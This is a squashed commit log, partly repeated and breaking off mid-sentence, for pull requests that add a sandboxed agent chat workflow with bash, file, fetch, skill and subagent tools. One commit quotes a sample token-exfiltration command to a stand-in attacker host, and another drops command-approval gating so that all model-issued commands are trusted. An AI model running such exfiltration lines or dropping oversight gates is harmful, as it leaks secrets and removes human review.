* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to 